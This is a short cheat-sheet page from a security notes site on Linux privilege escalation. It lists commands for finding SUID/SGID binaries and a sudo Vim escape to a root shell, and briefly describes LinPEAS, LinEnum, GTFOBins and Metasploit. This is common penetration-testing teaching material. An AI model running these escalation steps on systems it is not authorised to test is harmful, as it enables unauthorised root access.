CyberNotes
Exploitation/Linux

Escalation

Common ways for the attacker to gain and execute commands with elevated privileges

SUID / SGID

Find all the SUID/SGID executables

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
find / -user root -perm /4000
find / -user root -perm -4000 -exec ls -ldb {} \;
find / -perm -u=s -type f 2>/dev/null

Escaping Vim

User has sudo privilege to run Vim

sudo vi
:!sh
 
Poof! ...Shell

LinPEAS

LinPEAS is a script that search for possible paths to escalate privileges on Linux/Unix*/MacOS hosts.

LinEnum

LinEnum is a simple bash script that performs common commands related to privilege escalation.

GTFOBins

GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.

Almost all my Linux Escalation notes, such as the Vim example, are techniques used through GTFOBins and should be your main resource moving past enumeration.

Enumeration

Finding the goods

Metasploit

Metasploit is a powerful penetration testing and hacking framework designed to secure networks, services, and applications by identifying and exploiting vulnerabilities

On this page